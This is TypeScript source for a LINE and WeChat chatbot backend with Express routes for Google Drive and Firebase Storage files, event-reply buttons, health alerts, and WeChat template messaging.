type: "button",
action: {
type: "postback",
label: "不克前往",
data: `type=${type}&action=2`,
displayText: "不克前往",
}
},
{
type: "separator",
margin: "md"
}
)
break
case "23S":
contents.push(
{
type: "button",
action: {
type: "postback",
label: "a : 台北交通車",
data: `type=${type}&action=1`,
displayText: "a : 台北交通車"
}
},
{
type: "button",
action: {
type: "postback",
label: "b : 台中交通車",
data: `type=${type}&action=2`,
displayText: "b : 台中交通車"
}
},
{
type: "button",
action: {
type: "postback",
label: "c : 高鐵到新竹",
data: `type=${type}&action=3`,
displayText: "c : 高鐵到新竹"
}
},
{
type: "button",
action: {
type: "postback",
label: "d : 自行前往",
data: `type=${type}&action=4`,
displayText: "d : 自行前往"
}
},
{
type: "button",
action: {
type: "postback",
label: "e : 課前一天接機",
data: `type=${type}&action=5`,
displayText: "e : 課前一天接機"
}
},
{
type: "separator",
margin: "md"
}
)
break
case "32S":
contents.push(
{
type: "button",
action: {
type: "postback",
label: "a : 台北",
data: `type=${type}&action=1`,
displayText: "a : 台北"
}
},
{
type: "button",
action: {
type: "postback",
label: "b : 台中",
data: `type=${type}&action=2`,
displayText: "b : 台中"
}
},
{
type: "button",
action: {
type: "postback",
label: "c : 南區",
data: `type=${type}&action=3`,
displayText: "c : 南區"
}
},
{
type: "button",
action: {
type: "postback",
label: "d : 自行前往",
data: `type=${type}&action=4`,
displayText: "d : 自行前往"
}
},
{
type: "button",
action: {
type: "postback",
label: "e : 接機",
data: `type=${type}&action=5`,
displayText: "e : 接機"
}
},
{
type: "separator",
margin: "md"
}
)
break
case "33S":
contents.push(
{
type: "button",
action: {
type: "postback",
label: "抽菸",
data: `type=${type}&action=1`,
displayText: "抽菸"
}
},
{
type: "button",
action: {
type: "postback",
label: "打鼾",
data: `type=${type}&action=2`,
displayText: "打鼾"
}
},
{
type: "button",
action: {
type: "postback",
label: "素食",
data: `type=${type}&action=3`,
displayText: "素食"
}
},
{
type: "separator",
margin: "md"
}
)
break
case "41S":
contents.push(
{
type: "button",
action: {
type: "postback",
label: "參加",
data: `type=${type}&action=1`,
displayText: "參加"
}
},
{
type: "button",
action: {
type: "postback",
label: "不克前往",
data: `type=${type}&action=2`,
displayText: "不克前往"
}
},
{
type: "separator",
margin: "md"
}
)
break
case "42S":
contents.push(
{
type: "button",
action: {
type: "postback",
label: "參加",
data: `type=${type}&action=1`,
displayText: "參加"
}
},
{
type: "button",
action: {
type: "postback",
label: "不克前往",
data: `type=${type}&action=2`,
displayText: "不克前往"
}
},
{
type: "separator",
margin: "md"
}
)
break
}
}
if (sender.path) {
if (flexMessage.contents.type == "bubble" && flexMessage.contents.header) {
flexMessage.contents.header.contents.push({
type: "text",
text: sender.path,
weight: "bold",
size: "sm",
margin: "md"
})
}
}
msgObj.push(flexMessage)
msgObj = msgObj.concat(imgObj)
// console.log(flexMessage)
return contents.length > 0 ? msgObj : null
}
/**
* receiver為群組
* @param sender
* @param message
* @param files
*/
// export const toGroupMessage = (sender: Member, message?: string, files?: File[]): Message => {
// if (message && !files) {
// const textMessage: Message = {
// type: "text",
// text: `《來自${sender.name}》\n${sender.path}\n${message}`
// }
// return textMessage
// }
// if (files)
// return toPersonMessage(sender, message, files)
// return null
// }
const getURLfromString = (message: string): string[] => {
const regex = new RegExp(/[-a-zA-Z0-9@:%_\+.~#?&//=]{2,256}\.[a-z]{2,4}\b(\/[-a-zA-Z0-9@:%_\+.~#?&//=]*)?/gi)
return regex.exec(message)
}<file_sep>/src/fileWS.ts
import { Router } from "express"
import * as driveService from './services/driveService';
import * as config from './config';
import { google } from "googleapis"
import axios from 'axios'
import { Stream } from 'stream';
let fs = require('fs');
import * as mime from "mime"
import * as admin from 'firebase-admin';
const router = Router()
router.get('/getFile', async function (req, res) {
const auth = await driveService.authorize()
const drive = google.drive({ version: 'v3', auth });
const fileId = req.query.fileId;
driveService.getFileById(fileId).then(async doc => {
if (doc.exists) {
let file = doc.data()
// res.contentType("arraybuffer")
res.setHeader('content-type', 'arraybuffer');
res.setHeader("Content-Disposition", "attachment; filename=" + encodeURI(file.name) + "." + mime.getExtension(file.mimeType))
// res.setHeader("Content-Type", "arraybuffer; title=" + encodeURI(file.name))
console.log(JSON.stringify(file, null, 2))
const token = await auth.refreshAccessToken()
const result = await axios.get(`https://www.googleapis.com/drive/v3/files/${fileId}?alt=media`, {
responseType: "stream",
headers: {
"Authorization": "Bearer " + token.credentials.access_token,
}
})
const stream = result.data as Stream
stream.pipe(res) // <-- 將數據來源變成 ReadableStream
.on('finish', function () {
console.log('Sending done.');
});
} else {
res.sendStatus(403)
}
})
});
router.post('/uploadFileToStorage', async function (req, res) {
console.log("uploadFile");
// const mimeType = req.headers["content-type"]
const filename = req.body.filename
let path = ""
console.log("req.headers:", filename + " " + path);
if (req.body.hasOwnProperty("path")) {
path = req.body.path + "/"
}
let t1, t2;
t1 = new Date();
const now = +Date.now()
// let fileList = "uploadFile"
let base64String = req.body.file;
let bufferStream = new Stream.PassThrough();
let base64Image = base64String.split(';base64,').pop();
bufferStream.end(new Buffer(base64Image, 'base64'));
//Define bucket.
let bucket = admin.storage().bucket();
//Define file & file name.
var file = bucket.file(`${path}${now}/${filename}`, {});
//Pipe the 'bufferStream' into a 'file.createWriteStream' method.
let newType = mime.getType(filename.substring(filename.lastIndexOf(".") + 1, filename.length))
if (newType && newType != null) {
bufferStream.pipe(file.createWriteStream({
metadata: {
contentType: newType.toString()
},
validation: "md5"
}))
.on('error', function (err) { })
.on('finish', function () {
// The file upload is complete.
console.log(`${newType} ${now}/${filename} uploaded to bucket.`);
res.status(200).send({ url: `https://storage.googleapis.com/${config.storageBucket}/${path}${now}/${filename}` })
});
} else {
console.log(`${now}/${filename} cannot be uploaded to bucket.`);
res.sendStatus(403)
}
});
router.post('/deleteFileFromStorage', async function (req, res) {
console.log("deleteFile");
let path = "temp/"
let t1, t2;
t1 = new Date();
const now = +Date.now()
// let fileList = "uploadFile"
let bufferStream = new Stream.PassThrough();
//Define bucket.
let bucket = admin.storage().bucket();
//Define file & file name.
let filesGotten = bucket.getFiles({ prefix: path })
await filesGotten.then(fileObjs => {
// console.log("fileObjs:", fileObjs)
for (const fileObj of fileObjs[0]) {
console.log("fileObj.name:", fileObj.name)
let subObjName = fileObj.name.replace(path, "")
let stampNum = parseInt(subObjName.substring(0, subObjName.indexOf("/")))
console.log("subObjName:", stampNum)
if ((now - stampNum) > 604800000) {
let fileToDelete = path + subObjName.substring(0, subObjName.indexOf("/")) + "/"
console.log("Older than a week!", fileToDelete)
console.log("Expired:", (now - stampNum))
bucket.deleteFiles({ prefix: fileToDelete }).then(res => {
console.log("deleted", res)
}).catch(err => {
console.log("ERROR")
})
} else {
console.log("Newer than a week!")
}
}
})
res.status(200).send("files deleted")
});
// module.exports = router;
export default router
// router.get('/getFileFromLocal', bodyParser.json(), async function (req, res) {
// const fileId = req.query.fileId;
// driveService.getFileById(fileId).then(async doc => {
// if (doc.exists) {
// let file = doc.data()
// let basePath = "C:\\driveFiles\\Files\\"
// let extPath = ""
// res.setHeader('content-type', 'arraybuffer');
// res.setHeader("Content-Disposition", "attachment; filename=" + encodeURI(file.name) + "." + mime.getExtension(file.mimeType))
// console.log(JSON.stringify(file, null, 2))
// for (let i = 1; i < file.parentsName.length; i++) {
// extPath += file.parentsName[i].fullName + "\\"
// }
// console.log("basePath+extPath:", basePath + extPath + file.fullName)
// const stream = fs.createReadStream(basePath + extPath + file.fullName)
// stream.pipe(res) // <-- 將數據來源變成 ReadableStream
// .on('finish', function () {
// console.log('Sending done.');
// });
// } else {
// res.sendStatus(403)
// }
// })
// });<file_sep>/src/healthReport.ts
import { Router } from "express"
import * as Line from "@line/bot-sdk"
import * as config from "./config"
// import * as Moment from "moment"
import * as Moment from "moment-timezone"
const groupId = config.healthReportGroupId
const lineClient = new Line.Client(config.LINE)
const router = Router()
router.post("/healthReport", async (req, res) => {
const event = req.body
const serviceName = event.incident.policy_name
const serviceState = event.incident.state == "closed" ? "正常" : "異常"
let eventTime = new Date(event.incident.started_at * 1000)
eventTime.setHours(eventTime.getHours() + 8)
const time = Moment(eventTime)
// const eventTime = Moment((event.incident.started_at + 8 * 60 * 60) * 1000)
console.log(JSON.stringify(event, null, 4))
lineClient.pushMessage(groupId, {
type: "text",
text: "系統警示\n"
+ `${time.format("YYYY-MM-DD hh:mm:ss")}\n\n`
+ `服務名稱:${serviceName}\n`
+ `服務狀態:${serviceState}`
})
res.sendStatus(200)
})
router.get("/report", (req, res) => {
let eventTime = new Date()
const time = Moment(eventTime)
lineClient.pushMessage(groupId, {
type: "text",
text: "系統警示\n"
+ `${time.format("YYYY-MM-DD hh:mm:ss")}\n\n`
+ `服務名稱:Dialogflow\n`
+ `服務狀態:正常`
})
res.sendStatus(200)
})
export default router<file_sep>/src/services/chatbotService.ts
import * as Line from '@line/bot-sdk';
import * as config from '../config';
import * as memberService from './memberService';
import * as NodeCache from "node-cache"
import * as axios from 'axios'
import * as Moment from "moment-timezone"
const chatbotCache = new NodeCache({ stdTTL: 600, checkperiod: 0 });
// const express = require('express');
const lineBot = new Line.Client(config.LINE);
const monitorResponseMessage = (lineId: string, message: any): Promise<any> => {
let lineArr = []
let user;
if (lineId == undefined || lineId == null)
lineId = "User from Web without login"
return memberService.getMemberByAnyId(lineId).then(receiver => {
if (!receiver.empty) {
user = receiver.docs[0].data()
lineArr.push({ type: "text", text: `Response to: ${lineId} \n[${user.businessName} ${user.name} ${user.title}]` })
} else
lineArr.push({ type: "text", text: `Response to: ${lineId} [未綁定]` })
if (!Array.isArray(message))
lineArr.push(message)
else {
message.forEach(msg => {
lineArr.push(msg)
})
}
return lineBot.pushMessage(config.monitorGroupId, lineArr)
}).catch(error => {
lineArr.push({ type: "text", text: `Response to: ${lineId} getSales Error: ${error}` })
return lineBot.pushMessage(config.monitorGroupId, lineArr)
})
}
const wechatSend = (messageToSend) => {
return new Promise((resolve, reject) => {
chatbotCache.get("wechatAccessToken", (err, value) => {
if (!err && value) {
console.log("GetWechatToken: ", value)
const accessToken = value;
const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=${accessToken}`;
axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
console.log("response.data:", response.data)
if (response.data.errcode != 0) {
}
console.log("Send Success")
resolve("Send Success")
}).catch(error => console.log(error));
} else {
const getAccessTokenUrl = `https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=${config.wechatAccount.id}&secret=${config.wechatAccount.secret}`;
axios.default.get(getAccessTokenUrl).then(res => {
const accessToken = res.data.access_token;
console.log("token:",accessToken)
const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=${accessToken}`;
chatbotCache.set("wechatAccessToken", accessToken, 7000);
axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
console.log("response.data:", response.data)
if (response.data.errcode != 0) {
}
resolve("Send Success")
}).catch(error => console.log(error));
}).catch(error => console.log(error));
}
});
})
}
export const pushMessage = async (platformId, platformMessage) => {
// console.log("platformMessage:", JSON.stringify(platformMessage, null, 2))
if (platformId != config.monitorGroupId && platformMessage.hasOwnProperty("type")) {
monitorResponseMessage(platformId, platformMessage)
}
if (platformId.length == config.idLength.LINE) {
return lineBot.pushMessage(platformId, platformMessage);
} else {
let messageToSend = {}
let messageArray = []
if (platformMessage.constructor === Array) {
messageArray = platformMessage
} else {
messageArray.push(platformMessage)
}
for (let i = 0; i < messageArray.length; i++) {
if (messageArray[i].hasOwnProperty("type")) {
switch (messageArray[i].type) {
case "text":
messageToSend = {
touser: platformId,
msgtype: "text",
text: { content: messageArray[i].text }
};
break;
case "location":
messageToSend = {
type: "location",
location: {
title: messageArray[i].title,
address: messageArray[i].address,
latitude: messageArray[i].latitude,
longitude: messageArray[i].longitude
}
};
if (platformId.length == config.idLength.WECHAT) {
messageToSend = {
touser: platformId,
msgtype: "text",
text: {
content: `${messageArray[i].title}\n${messageArray[i].address}`
}
};
}
break;
case "image":
messageToSend = {
type: "image",
image: messageArray[i].originalContentUrl
};
break;
case "audio":
messageToSend = {
type: "audio",
audio: {
audioUrl: messageArray[i].originalContentUrl,
duration: messageArray[i].duration
}
};
break;
case "video":
messageToSend = {
type: "video",
video: {
title: "<Video title>",
description: "<Video description>",
previewImage: messageArray[i].previewImageUrl,
videoUrl: messageArray[i].originalContentUrl
}
};
break;
case "template":
let columnsOptions = [];
if (platformId.length == config.idLength.WECHAT) {
if (messageArray[i].template.type == "confirm") {
columnsOptions.push({
title: messageArray[i].template.text + "\n" + messageArray[i].template.actions[0].label,
description: messageArray[i].template.text,
url: messageArray[i].template.actions[0].uri,
});
for (let k = 1; k < messageArray[i].template.actions.length; k++) {
columnsOptions.push({
title: messageArray[i].template.actions[k].label,
description: messageArray[i].template.text,
url: messageArray[i].template.actions[k].uri,
});
}
messageToSend = {
touser: platformId,
msgtype: "news",
news: {
articles: columnsOptions
}
};
}
if (messageArray[i].template.type == "buttons") {
for (let k = 0; k < messageArray[i].template.actions.length; k++) {
columnsOptions.push({
title: messageArray[i].template.actions[k].label,
description: messageArray[i].template.text,
url: messageArray[i].template.actions[k].uri,
});
}
messageToSend = {
touser: platformId,
msgtype: "news",
news: {
articles: columnsOptions
}
};
}
if (messageArray[i].template.type == "carousel") {
for (let k = 0; k < messageArray[i].template.columns.length; k++) {
columnsOptions.push({
title: messageArray[i].template.columns[k].text,
description: messageArray[i].template.columns[k].text,
url: ``,
});
}
messageToSend = {
touser: platformId,
msgtype: "news",
news: {
articles: columnsOptions
}
}
}
}
break;
case "imagemap":
let actionsOptions = [];
for (let k = 0; k < messageArray[i].actions.length; k++) {
actionsOptions.push({
title: messageArray[i].altText,
description: messageArray[i].altText,
url: messageArray[i].actions[k].linkUri,
});
}
messageToSend = {
touser: platformId,
msgtype: "news",
news: {
articles: actionsOptions
}
}
break;
}
} else {
messageArray[i].touser = platformId
messageToSend = messageArray[i]
}
console.log(JSON.stringify(messageToSend));
await wechatSend(messageToSend)
}
}
};
export const pushWechatTemplateMessage = async (platformId, platformMessage) => {
console.log("platformMessage:", JSON.stringify(platformMessage, null, 2))
if (platformId != config.monitorGroupId && platformMessage.hasOwnProperty("type")) {
monitorResponseMessage(platformId, platformMessage)
}
let messageToSend = {}
let messageArray = []
let eventTime = new Date()
eventTime.setHours(eventTime.getHours() + 8) // if on Cloud
const time = Moment(eventTime)
if (platformMessage.constructor === Array) {
messageArray = platformMessage
} else {
messageArray.push(platformMessage)
}
for (let i = 0; i < messageArray.length; i++) {
messageArray[i].touser = platformId
messageArray[i].template_id = config.generalTemplateId
for (let j = 1; j < messageArray[i].news.articles.length; j++) {
messageArray[i].url = messageArray[i].news.articles[j].url
messageArray[i].data = {}
messageArray[i].data["first"] = {
value: "",
color: "#173177"
}
messageArray[i].data["keyword1"] = {
value: messageArray[i].news.articles[0].title,
color: "#173177"
}
messageArray[i].data["keyword2"] = {
value: messageArray[i].news.articles[0].description,
color: "#173177"
}
messageArray[i].data["keyword3"] = {
value: `${time.format("YYYY-MM-DD hh:mm:ss")}`,
color: "#173177"
}
messageArray[i].data["remark"] = {
value: `請點選「詳情」${messageArray[i].news.articles[j].description}`,
color: "#173177"
}
messageToSend = messageArray[i]
console.log(JSON.stringify(messageToSend));
await wechatTemplateSend(messageToSend)
}
}
};
export const wechatTemplateSend = async (messageToSend) => {
return new Promise((resolve, reject) => {
chatbotCache.get("wechatAccessToken", (err, value) => {
if (!err && value) {
console.log("GetWechatToken: ", value)
const accessToken = value;
const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=${accessToken}`;
axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
console.log("response.data:", response.data)
if (response.data.errcode != 0) {
}
console.log("Send Success")
resolve("Send Success")
}).catch(error => console.log(error));
} else {
const getAccessTokenUrl = `https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=${config.wechatAccount.id}&secret=${config.wechatAccount.secret}`;
axios.default.get(getAccessTokenUrl).then(res => {
const accessToken = res.data.access_token;
const pushMessageUrl = `https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=${accessToken}`;
chatbotCache.set("wechatAccessToken", accessToken, 7000);
axios.default.post(pushMessageUrl, messageToSend).then(function (response) {
console.log("response.data:", response.data)
if (response.data.errcode != 0) {
}
resolve("Send Success")
}).catch(error => console.log(error));
}).catch(error => console.log(error));
}
});
})
}
export const replyMessage = (replyToken, lineMessage) => {
return lineBot.replyMessage(replyToken, lineMessage);
};<file_sep>/src/actionSubscriber.ts
import { jsonToStructProto, structProtoToJson } from './structjson'
import * as responseConfig from './responseConfig'
import * as config from './config'
import * as memberService from "./services/memberService"
import * as lineServices from "./services/lineService"
import { pushMessage } from './services/chatbotService'
import { ChatMessage, Member, RecordDetail, MessageTemplate } from './model';
import * as chatMessageService from './services/chatMessageService'
const userRegistration = (lineId: string): Promise<any> => {
let uri = config.uriName + "lineLogin?target=login"
if (lineId.length == config.idLength.WECHAT) {
uri = config.uriName + "wechatLogin?target=loginWechat"
}
let message = {
type: "template",
altText: `歡迎使用《${config.appName}》`,
template: {
type: "buttons",
title: `歡迎使用《${config.appName}》`,
text: `請點選<登入>,經身份認證後,授權您使用《${config.appName}》`,
actions: [
{
type: "uri",
label: "登入",
uri: uri
}
]
}
}
return pushMessage(lineId, message)
}
const unMatchOnce = (lineId: string): Promise<any> => {
let message = { type: "text", text: "我不太了解您的指令,請再說一次" }
return pushMessage(lineId, message)
}
const unMatchTwice = (lineId: string): Promise<any> => {
let message = [{ type: "text", text: "我不太了解您的指令,請再說一次,或以下列主選單操作" }, JSON.parse(responseConfig.mainMenu)]
return pushMessage(lineId, message)
}
const dialogFlowError = (lineId: string): Promise<any> => {
let message = { type: "text", text: "系統忙碌中,請稍後再試" }
return pushMessage(lineId, message)
}
const menuAction = async (lineId, dialogflowResult): Promise<any> => {
const parameters = structProtoToJson(dialogflowResult.parameters)
const instruction = parameters["instruction"]
let lineMsg
if (responseConfig[instruction] != undefined) {
// sendToBigQuery(lineId, userName, divsionName, `menu:${instruction}`)
lineMsg = JSON.parse(responseConfig[instruction])
return pushMessage(lineId, lineMsg)
} else {
console.log("responseConfig[instruction] is undefined")
}
}
const dialogflowFulfillmentText = async (userId, dialogflowResult): Promise<any> => {
// should set response from dialogflow
let speech = ""
let msg = {
type: "text",
text: ""
}
if (dialogflowResult.fulfillmentText != undefined) {
speech = dialogflowResult.fulfillmentText.replace(/\\n/g, "\n");
}
let qText: string = dialogflowResult.queryText
let memberSnapShot = await memberService.getMemberByAnyId(userId)
if (!memberSnapShot.empty) {
let memberData: Member = memberSnapShot.docs[0].data() as Member
// if (receiverData.type == "member") {
let memberUpdateData: Member = { ...memberData, session: "recent" }
await memberService.setMember(memberUpdateData)
let userMessage: ChatMessage = {
id: userId
}
await chatMessageService.setChatMessage(userMessage)
let channel = ""
if (userId.length == config.idLength.LINE) {
channel = "Line"
} else if (userId.length == config.idLength.WECHAT) {
channel = "WeChat"
}
const trackId = chatMessageService.getRecordDetailUUID(userMessage.id)
const recordDetail: RecordDetail = {
id: trackId,
receiver: { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "", role: "staff", unReadMessages: 0 },
channel: channel as MessageTemplate['channel'],
message: qText.replace(/\n/g, "\\n"),
isSucceed: true,
receiveTime: new Date().getTime(),
read: false
}
// const lineMessage = lineServices.toPersonMessage(memberSnapShot.docs[0].data() as Member, "system", `${userMessage.sender.name}留言通知\nhttps://messagingsystem-218402.firebaseapp.com/connect/${userId}`, [])
// pushMessage("Uea40f2abaf004484ff382dcdaf1a3a94", lineMessage).catch(err => {
// console.log("err:", err)
// })
// const wechatMessages = toTemplateMessages(memberSnapShot.docs[0].data() as Member, "system", { id: "system", name: "", email: "", mobilePhone: "", lineId: "", wechatId: "ov3qV1fHPnVuEihyiKTVODNofGF4", role: "staff" }, `${userMessage.sender.name}留言通知\nhttps://messagingsystem-218402.firebaseapp.com/connect/${userId}`, [])
// pushTemplateMessages(wechatMessages).catch(err => {
// console.log("err:", err)
// })
// if (qText == "參加") {
// msg.text = "學長您好!已收到您的回覆,謝謝您!"
// await pushMessage(userId, msg).then(success=>{
// chatMessageService.createChatMessage(recordDetail.receiver, memberSnapShot.docs[0].data() as Member, channel, msg.text, [], "")
// })
// } else if (qText == "不克參加") {
// msg.text = "學長您好!謝謝您的回覆,期待下次您的參與!"
// await pushMessage(userId, msg).then(success=>{
// chatMessageService.createChatMessage(recordDetail.receiver, memberSnapShot.docs[0].data() as Member, channel, msg.text, [], "")
// })
// }
return chatMessageService.setRecordDetail(userMessage.id, recordDetail)
// }
}
if (speech.length > 0) {
// msg.text = speech
// msg.text = "我不太了解您的指令,請再說一次"
} else {
msg.text = "我不太了解您的指令,請再說一次"
}
if (msg.text != "") {
return pushMessage(userId, msg)
} else {
return Promise.resolve()
}
}
export const actionSubscriber = async (lineId: string, action: string, dataResult: any) => {
// dataResult from dialogflow result or postback data
let lineMessage = new Array
const response = dataResult.fulfillmentText
const parameters: any = structProtoToJson(dataResult.parameters)
// let results = getResultFromParameters(parameters)
const userId = lineId
// sendToBigQuery(lineId, userName, divsionName, action)
console.log(`[${dataResult.queryText}] matches [${action}] in actionSubscriber`)
// console.log(JSON.stringify(dataResult, null, 2))
switch (action) {
case 'userRegistration':
return userRegistration(lineId).catch(error => console.log("%s userRegistration error:", lineId, error))
case 'unMatchOnce':
return unMatchOnce(lineId).catch(error => console.log("%s unMatchOnce error:", lineId, error))
case 'unMatchTwice':
return unMatchTwice(lineId).catch(error => console.log("%s unMatchTwice error:", lineId, error))
case 'dialogFlowError':
return dialogFlowError(lineId).catch(error => console.log("%s dialogFlowError error:", lineId, error))
case 'menu':
return menuAction(lineId, dataResult).catch(error => console.log("%s menuAction error:", lineId, error))
case 'flightInfo':
lineMessage.push(lineServices.textMessage("我們已收到您的回覆"))
// setDialogflowEvent(userId, "askForDepartDate", {})
break
case 'attend':
lineMessage.push(lineServices.textMessage("感謝您的參與,稍後將與您聯繫"))
break
case 'absent':
lineMessage.push(lineServices.textMessage("感謝您的回覆,期待您下次的參與"))
break
case "askForDepartDate":
lineMessage.push(lineServices.textMessage(response))
break
case "askForDepartFlight":
lineMessage.push(lineServices.textMessage(response))
break
case "askForDepartPlace":
lineMessage.push(lineServices.textMessage(response))
break
case "askForDepartTime":
lineMessage.push(lineServices.textMessage(response))
break
case "askForArrivePlace":
lineMessage.push(lineServices.textMessage(response))
break
case "askForArriveTime":
lineMessage.push(lineServices.textMessage(response))
break
case "askForPickUp":
lineMessage.push(lineServices.textMessage(response))
break
default:
return dialogflowFulfillmentText(lineId, dataResult).catch(error => console.log("%s dialogflowFulfillmentText error:", lineId, error))
}
lineServices.pushMessage(userId, lineMessage)
}
// module.exports = router;<file_sep>/src/services/messageTemplateService.ts
import * as admin from 'firebase-admin';
import { MessageTemplate } from '../model';
const messageTemplateCollection = admin.firestore().collection("Message");
export const setMessageTemplate = function (message: MessageTemplate) {
return messageTemplateCollection.doc(message.id).set(message, { merge: true })
}
export const getMessageTemplate = function (id: string) {
return messageTemplateCollection.doc(id).get().then(snapshot => {
if (snapshot.exists)
return snapshot.data() as MessageTemplate
return null
})
}
export const getMessageTemplateByContent = function (content: string) {
return messageTemplateCollection.where("content", "==", content).get()
}
export const deleteMessageTemplate = (id: string) => {
return messageTemplateCollection.doc(id).delete()
}<file_sep>/src/services/wechatService.ts
import Axios from "axios"
import * as Cache from "node-cache"
import { uriName, wechatAccount, textTemplateId, fileTemplateId, generalTemplateId, backendUrl } from "../config"
import { Member, File, MessageTemplate } from "../model"
import * as Moment from "moment-timezone"
import * as opencc from "node-opencc"
const cache = new Cache({ stdTTL: 7000, checkperiod: 0 })
type TemplateMessage = {
touser: string
template_id: string
url?: string
data: any
}
type CustomMessage = {
touser: string
msgtype: string
text?: {
content: string
}
image?: any
video?: any
music?: any
news?: any
}
export const pushTemplateMessage = async (wechatMessage: TemplateMessage): Promise<any> => {
const accessToken = await getAccessToken()
const apiUrl = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=" + accessToken
return Axios.post(apiUrl, wechatMessage).then(result => {
console.log(result.data)
const errorCode = result.data.errcode as number
if (errorCode > 0)
return Promise.reject(result.data.errmsg)
return Promise.resolve("ok")
}).catch(error => {
console.log(error)
return Promise.reject(error)
})
}
export const pushCustomMessage = async (wechatMessage: CustomMessage): Promise<any> => {
const accessToken = await getAccessToken()
const apiUrl = "https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=" + accessToken
return Axios.post(apiUrl, wechatMessage).then(result => {
console.log(result.data)
const errorCode = result.data.errcode as number
if (errorCode > 0)
return Promise.reject(result.data.errmsg)
return Promise.resolve("ok")
}).catch(error => {
console.log(error)
return Promise.reject(error)
})
}
export const pushTemplateMessages = async (wechatMessages: Array<TemplateMessage>): Promise<any> => {
for (const wechatMessage of wechatMessages)
await pushTemplateMessage(wechatMessage)
}
// export const toTemplateMessages = (sender: Member, trackId: string, receiver: Member, message?: string, files?: File[]): Array<TemplateMessage> | null => {
// const wechatMessages = []
// if (message) {
// const urls = getURLfromString(message)
// if (urls) {
// message = message.replace(urls[0], "")
// }
// // let wechatMessage: TemplateMessage = {
// // touser: receiver.wechatId,
// // template_id: textTemplateId,
// // data: {
// // sender: {
// // value: sender.name,
// // color: "#000000"
// // },
// // content: {
// // value: message,
// // color: "#000000"
// // }
// // }
// // }
// let eventTime = new Date()
// // eventTime.setHours(eventTime.getHours() + 8) // if on Cloud
// const time = Moment(eventTime)
// let wechatMessage: TemplateMessage = {
// touser: receiver.wechatId,
// template_id: generalTemplateId,
// data: {
//
// keyword1: {
// value: "訊息",
// color: "#000000"
// },
// keyword2: {
// value: message,
// color: "#000000"
// },
// keyword3: {
// value: `${time.format("YYYY-MM-DD hh:mm:ss")}`,
// color: "#173177"
// }
// }
// }
// if (urls)
// wechatMessage.url = backendUrl + "urlRedirect?trackId=" + trackId + "&url=" + urls[0]
// if (sender.path) {
// wechatMessage.data.path = {
// value: sender.path,
// color: "#000000"
// }
// }
// wechatMessages.push(wechatMessage)
// }
// if (files) {
// for (const file of files) {
// wechatMessages.push({
// touser: receiver.wechatId,
// template_id: generalTemplateId,
// url: `${uriName}pdf/${file.id}/${trackId}`,
// data: {
// keyword2: {
// value: file.name,
// color: "#000000"
// }
// }
// })
// }
// }
// return wechatMessages.length > 0 ? wechatMessages : null
// }
export const toTemplateMessagesMQ = (sender: Member, channelId: string, message?: string, storageUrls?: MessageTemplate["urls"], thumb?: string): Array<TemplateMessage> | null => {
const wechatMessages = []
let eventTime = new Date()
// eventTime.setHours(eventTime.getHours() + 8) // if on Cloud
const time = Moment(eventTime)
if (message) {
const urls = getURLfromString(message)
if (urls) {
message = message.replace(urls[0], "")
}
let wechatMessage: TemplateMessage = {
touser: channelId,
template_id: generalTemplateId,
data: {
keyword1: {
value: `訊息`,
color: "#000000"
},
keyword2: {
value: opencc.traditionalToSimplified(message),
color: "#000000"
},
keyword3: {
value: `${time.format("YYYY-MM-DD HH:mm:ss")}`,
color: "#173177"
}
}
}
if (urls && urls.length > 0) {
wechatMessage.url = urls[0]
}
// wechatMessage.url = backendUrl + "urlRedirect?trackId=" + trackId + "&url=" + urls[0]
if (sender.path) {
wechatMessage.data.path = {
value: sender.path,
color: "#000000"
}
}
wechatMessages.push(wechatMessage)
}
if (storageUrls) {
for (const storageUrl of storageUrls) {
let viewerUrl: string = encodeURI(decodeURI(storageUrl.url))
switch (viewerUrl.substring(viewerUrl.lastIndexOf(".") + 1, viewerUrl.length).toLowerCase()) {
case "pptx":
case "ppt":
case "docx":
case "doc":
case "xlsx":
case "xls":
viewerUrl = "https://view.officeapps.live.com/op/embed.aspx?src=" + viewerUrl
break
case "pdf":
viewerUrl = "https://docs.google.com/viewerng/viewer?url=" + viewerUrl
break
default:
break
}
wechatMessages.push({
touser: channelId,
template_id: generalTemplateId,
url: `${viewerUrl}`,
data: {
keyword1: {
value: "檔案",
color: "#000000"
},
keyword2: {
value: storageUrl.name,
color: "#000000"
},
keyword3: {
value: `${time.format("YYYY-MM-DD HH:mm:ss")}`,
color: "#173177"
}
}
})
}
}
if (thumb && thumb != "") {
wechatMessages.push({
touser: channelId,
template_id: generalTemplateId,
url: `${encodeURI(decodeURI(thumb))}`,
data: {
keyword1: {
value: "圖片",
color: "#000000"
},
keyword2: {
value: "公告",
color: "#000000"
},
keyword3: {
value: `${time.format("YYYY-MM-DD HH:mm:ss")}`,
color: "#173177"
}
}
})
}
return wechatMessages.length > 0 ? wechatMessages : null
}
export const toCustomTextMessage = (receiver: Member, message: string, hyperlinks?: Array<{ key: string, url: string }>) => {
let result = opencc.traditionalToSimplified(message)
if (hyperlinks) {
for (const hyperlink of hyperlinks)
result = result.replace(hyperlink.key, `<a href="${hyperlink.url}">${hyperlink.key}</a>`)
}
return {
touser: receiver.wechatId,
msgtype: "text",
text: {
content: result
}
}
}
export const toFileMessage = (receiver: Member, file: File) => {
const wechatMessage = {
touser: receiver.wechatId,
msgtype: "news",
news: {
articles: [{
title: "檔案",
description: file.name,
url: "<http://file url>"
}]
}
}
return wechatMessage
}
export const toSmartQueryMessage = (receiver: Member) => {
const wechatMessage = {
touser: receiver.wechatId,
msgtype: "text",
text: {
content: "《智慧查詢》\n\n請依序說出查詢條件(公司/地區/部門)以快速去得聯絡資訊"
}
}
return wechatMessage
}
const getAccessToken = async (): Promise<string> => {
const apiUrl = `https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=${wechatAccount.id}&secret=${wechatAccount.secret}`
let token = ""
try {
token = cache.get("accessToken") as string
} catch{
console.log("Existing WechatToken: empty", token)
}
if (token != undefined && token != "") {
